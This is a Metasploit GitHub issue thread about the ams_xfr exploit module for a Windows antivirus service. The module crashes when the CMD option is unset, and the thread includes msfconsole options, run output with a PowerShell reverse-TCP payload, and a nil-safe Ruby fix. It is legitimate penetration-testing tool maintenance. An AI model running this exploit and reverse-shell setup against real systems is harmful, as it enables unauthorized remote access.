
exploit/windows/antivirus/ams_xfr exploit fails when cmd is unset #6888

Closed
digininja opened this issue May 17, 2016 · 8 comments

Comments

@digininja
Contributor

Steps to reproduce

Unsetting CMD causes an error when running the exploit

msf exploit(ams_xfr) > show options

Module options (exploit/windows/antivirus/ams_xfr):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   CMD    dir              no        Execute this command instead of using command stager
   RHOST  172.1.1.1        yes       The target address
   RPORT  12174            yes       The target port


Payload options (windows/powershell_reverse_tcp):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   EXITFUNC      process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST         172.1.1.2        yes       The listen address
   LOAD_MODULES                   no        A list of powershell modules seperated by a comma to download over the web
   LPORT         4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows Universal



msf exploit(ams_xfr) > run

[*] Started reverse SSL handler on 172.1.1.2:4444 
[*] 172.1.1.1:12174 - Sending request to 172.1.1.1:12174
[*] 172.1.1.1:12174 - Got data, execution successful!
[*] 172.1.1.1:12174 - Command Stager progress -  59.09% done (26/44 bytes)
[*] 172.1.1.1:12174 - Got data, execution successful!
[*] 172.1.1.1:12174 - Command Stager progress - 100.00% done (44/44 bytes)
[*] 172.1.1.1:12174 - Attempting to execute the payload...
[-] 172.1.1.1:12174 - Exploit failed: RangeError 73804 out of char range
[*] Exploit completed, but no session was created.

msf exploit(ams_xfr) > unset CMD
Unsetting CMD...
msf exploit(ams_xfr) > run

[*] Started reverse SSL handler on 172.1.1.2:4444 
[-] 172.1.1.1:12174 - Exploit failed: NoMethodError undefined method `empty?' for nil:NilClass
[*] Exploit completed, but no session was created.

This was repeatable.

Expected behavior

Shouldn't get the error.

Current behavior

Unset seems to change the CMD to nil, where before, when it wasn't set, it was probably an empty string.

System stuff

Metasploit version

3ea2f62376423aefdb1d98a87503ab348b892956 Land #6875, update description for auxiliary/spoof/nbns/nbns_response

I installed Metasploit with:

direct from Git Master

$ ruby -v
ruby 2.3.1p112 (2016-04-26 revision 54768) [x86_64-linux]

OS

Ubuntu
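The failure described in this report (an optional option that is nil after `unset` but was an empty string when never set) is a common pattern in Ruby modules that call `empty?` directly on a datastore value. The following is an added example, not the ams_xfr module's own code and not from any commenter: it uses a plain Hash as a constructed stand-in for a Metasploit datastore and a placeholder string for the command stager, and shows the naive check next to a nil-safe one.

```ruby
# Added example (not the ams_xfr module's code): why `datastore['CMD'].empty?`
# raises NoMethodError once CMD has been unset, and a nil-safe alternative.

# Constructed stand-in for the module datastore. An option that was never set,
# or that the user ran `unset` on, is simply absent, so lookup returns nil.
def datastore_with(cmd)
  ds = { 'RHOST' => '172.1.1.1', 'RPORT' => 12174 }  # constructed sample values
  ds['CMD'] = cmd unless cmd.nil?
  ds
end

# Naive check matching the reported behaviour: works for '' and 'dir',
# but raises "undefined method `empty?' for nil:NilClass" when CMD is nil.
def naive_custom_command?(datastore)
  !datastore['CMD'].empty?
end

# Nil-safe check: nil, empty, and whitespace-only all mean "use the stager".
# (Rails/ActiveSupport users would write `!datastore['CMD'].blank?`.)
def custom_command?(datastore)
  cmd = datastore['CMD']
  !(cmd.nil? || cmd.strip.empty?)
end

# Picks what the module would execute: the operator's command if one was
# given, otherwise the command stager (represented here by a placeholder).
def command_to_execute(datastore, stager_command = '<command-stager>')
  custom_command?(datastore) ? datastore['CMD'] : stager_command
end

if __FILE__ == $0
  [datastore_with('dir'), datastore_with(''), datastore_with(nil)].each do |ds|
    begin
      naive = naive_custom_command?(ds)
    rescue NoMethodError => e
      naive = "NoMethodError: #{e.message}"
    end
    puts "CMD=#{ds['CMD'].inspect}: naive=#{naive.inspect} " \
         "safe=#{custom_command?(ds)} runs=#{command_to_execute(ds)}"
  end
end
```

The point of the nil-safe version is that the module's behaviour should not depend on whether an option arrived as an empty string or as nil; both are "no custom command", and the stager path should be taken in either case.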

@nixawk
Contributor

nixawk commented May 17, 2016

@digininja
Contributor Author

That fixed it.

Still not getting a shell but doubt that is your fault :(

@nixawk
Contributor

nixawk commented May 18, 2016

@digininja Could you show us how to set up your lab?

@digininja
Contributor Author

It isn't a lab, it is on site with a client.

On Wed, 18 May 2016 at 09:51 Security Corporation notifications@github.com
wrote:

> @digininja https://github.com/digininja Could you show us how to set up your lab?

@nixawk
Contributor

nixawk commented May 18, 2016

@digininja please upload a pcap to show your exploit details.

@digininja
Contributor Author

I'll have to check with the client. Do you have a private address I can send it to if they say yes?

On Wed, 18 May 2016 at 10:02 Security Corporation notifications@github.com
wrote:

> please send us a pcap to show your exploit details.

@wchen-r7
Contributor

This issue is considered resolved because of #6889. For the reliability issue, please go ahead and file that as a separate issue so we can keep track of that specifically instead of it being buried in the comments here. And I hope that one is solvable, because getting the vuln app again for testing may be tricky. Thanks.

@digininja
Contributor Author

I've no longer got access to the app so I'll leave it for now and if I ever find it again I'll see what happens.
